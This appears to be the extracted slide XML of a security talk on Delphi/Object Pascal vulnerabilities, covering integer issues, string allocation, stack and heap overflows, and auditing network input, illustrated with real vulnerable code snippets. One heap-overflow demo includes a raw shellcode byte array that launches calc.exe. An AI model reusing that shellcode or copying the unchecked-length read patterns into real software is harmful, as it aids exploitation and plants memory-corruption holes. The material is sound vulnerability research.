              </a:rPr>
              <a:t>;          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>// overflow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FreeMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(p);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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heap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543883"/>
            <a:ext cx="7772400" cy="39703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const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shellcode:array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[0..132] of BYTE = ( // exec of calc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $eb,$06,$aa,$aa,$aa,$aa,$aa,$aa, // jump over this, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aaaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> gets overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $fc,$e8,$44,$00,$00,$00,$8b,$45,$3c,$8b,$7c,$05,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $78,$01,$ef,$8b,$4f,$18,$8b,$5f,$20,$01,$eb,$49,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $8b,$34,$8b,$01,$ee,$31,$c0,$99,$ac,$84,$c0,$74,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $07,$c1,$ca,$0d,$01,$c2,$eb,$f4,$3b,$54,$24,$04,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $75,$e5,$8b,$5f,$24,$01,$eb,$66,$8b,$0c,$4b,$8b,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $5f,$1c,$01,$eb,$8b,$1c,$8b,$01,$eb,$89,$5c,$24,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $04,$c3,$5f,$31,$f6,$60,$56,$64,$8b,$46,$30,$8b,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $40,$0c,$8b,$70,$1c,$ad,$8b,$68,$08,$89,$f8,$83,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $c0,$6a,$50,$68,$7e,$d8,$e2,$73,$68,$98,$fe,$8a,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $0e,$57,$ff,$e7,$63,$61,$6c,$63,$2e,$65,$78,$65,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $00,$00,$00,$00,$00);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Delphi: heap (demo)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integer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rules are different from c !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truncation is the same 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overflow is the same* </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No division by 0 ! (all divisions have to be stored in Extended, which will say + or – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for division by 0)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09989" y="6629400"/>
            <a:ext cx="8340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* see later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integer issues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35760"/>
          <a:ext cx="8534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8288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 (in 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(or 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Supposed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to hold a character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0..255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Shortint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-128..127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Smallint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-32768..32767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0..65535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-2147483648.. 2147483647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Longint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-2147483648.. 2147483647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Longword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0..4294967295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0..4294967295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-2^63..(2^63)-1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8686800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn’t appear to be an unsigned 64 bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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rocket science</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No one ever seemed to have looked into this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assume you know some basic things (stack, heap, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> overflow, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Was a fun little project to do </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>wanted to see if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pascal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to the same issues that c programs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All research was done with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>delphi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Might differ for other object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pascal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> compilers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or older versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>delphi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Delphi integer issues: Signed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signed with unsigned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> promotion is done !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is bound to cause problems for people that usually write c code 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Delphi integer issues: Signed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following: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Outputs: “Signed comparison”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209800"/>
            <a:ext cx="6553200" cy="3416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toeter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: integer;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lw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Longword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-5;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:= 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) then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('promoted to unsigned')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   else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('Signed comparison');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Delphi integer issues: Signed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Obviously if you cast to unsigned it’ll do an unsigned comparison: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Will output “promoted to unsigned”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679680"/>
            <a:ext cx="6553200" cy="34163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procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>toeter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: integer;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lw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Longword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-5;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lw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> := 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Longword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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) then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('promoted to unsigned')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   else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WriteLn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>('Signed comparison');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string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Pascal string type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shortstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shortstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the old (static) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pascal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> string (limited to 255 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String is dynamically allocated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ansistring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Unicodestring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ansistring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is 1 byte for each character </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unicodestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is 2 bytes for each character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string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String has several basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>api’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to work with: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SetLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(s:string;len:Integer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Length(s:string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copy(s:string; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>index:integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>count:integer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string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SetLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() used to dynamically allocate a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SetLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() will allocate 0 bytes and set length to 0 if a negative length is specified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 string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209800"/>
            <a:ext cx="7391400" cy="44319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procedure blah;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  Buffer: String;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  size : Integer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>AThread.Connection.ReadBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(size,4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SetLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Buffer, size); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> size will be 0 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>AThread.Connection.ReadBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Buffer[1], size);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err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>bof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>end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Intersting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> things to get input from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BlockRead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Image objects </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Winsock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Winsock.RecvFrom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>winsock.recv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Indy, popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>delphi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> framework for networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Connection.ReadBuffer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Connection.ReadInt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The auditing is very similar to c code auditing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will show some code to get a feel for the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Won’t cover it in details </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tho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It’s all real code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Got it from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dirty="0" err="1" smtClean="0"/>
              <a:t>codesearch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Most of it are unit tests, demo code, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Didn’t map the code to projects </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Just want to show some real world code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28600"/>
            <a:ext cx="8001000" cy="64633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type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TAudioRec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=record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Flag:DWORD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num:DWORD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buflen:WORD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buf:Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1..1000] of byte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end;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procedure TForm1.IdTCPServer1Execute(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TIdPeerThread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buf:TAudioRec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; &lt;-- stack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outbuf:Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[1..16000] of byte;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outbufsize:Integer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  if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ACMOut.Active</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  begin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AThread.Connection.ReadBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Buf,10)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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf.Flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>beefface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) and (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf.buflen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;0) then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    begin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AThread.Connection.ReadBuffer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buf.Buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf.buflen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;  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0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Exploitation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Stack overflows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Heap issues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Integer issues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Delphi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What to look for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(auditing)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Mitigations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90691"/>
            <a:ext cx="7696200" cy="618630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SearchPacketListing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(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tc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TChara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AThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TIdPeerThread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Ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> :word;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        packet : word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>boolean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      j : integer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        size : word;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RecvBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; 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	else begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	//Usually our string messages, where the 2nd location is the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	//size holder of the string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AThread.Connection.ReadBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RecvBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[2], 2);</a:t>
            </a:r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size := RFIFOW(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RecvBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 2);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AThread.Connection.ReadBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RecvBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[4], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size - 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		end;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1493"/>
            <a:ext cx="8763000" cy="6740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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TlvkTCPIPCommunicationsQueueClient.Pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(out Item: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IUnknown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const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PopFromFront</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Boolean; const Timeout: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>LongWord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const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TerminationEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>THandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>): Boolean;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Connection    : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IlvkClientSocket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Stream        : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TMemoryStream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DataLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
